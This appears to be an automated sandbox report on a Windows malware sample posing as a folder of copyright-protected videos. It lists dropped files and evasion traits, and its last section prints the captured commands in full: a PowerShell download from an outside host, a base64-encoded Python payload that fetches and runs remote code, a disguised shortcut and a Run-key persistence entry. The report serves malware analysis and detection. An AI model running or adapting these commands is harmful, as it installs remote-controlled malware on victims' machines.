Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32ui.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\odbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA1.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmon.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32uiole.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\mmapfile.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_chacha20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_poly1305.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Math\_modexp.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\pythonservice.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD5.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\mapi\mapi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\servicemanager.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\vcruntime140.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\shell\shell.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA384.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\scintilla.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\python310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\adsi\adsi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\bits\bits.pyd			Jump to dropped file

Boot Survival

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_keccak.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA256.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axscript\axscript.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Protocol\_scrypt.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pythoncom310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_ARC4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\authorization\authorization.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\propsys\propsys.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA512.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\internet\internet.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmondata.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_x25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\directsound\directsound.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed448.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pywintypes310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA224.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\ifilter\ifilter.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\odbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32ui.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA1.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmon.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\mmapfile.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\win32uiole.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_chacha20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_poly1305.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Math\_modexp.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\pythonservice.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD5.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\mapi\mapi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\servicemanager.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\shell\shell.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA384.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pythonwin\scintilla.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\python310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\adsi\adsi.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\bits\bits.pyd			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 3728

Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: dropped/ConDrv, type: DROPPED

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'qkxB9Wn8nG'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'qkxB9Wn8nG.zip'), $dst) "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindxwsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPeth = "$env:LOCALAPPDATA\qkxB9Wn8nG\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-Itemmroperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
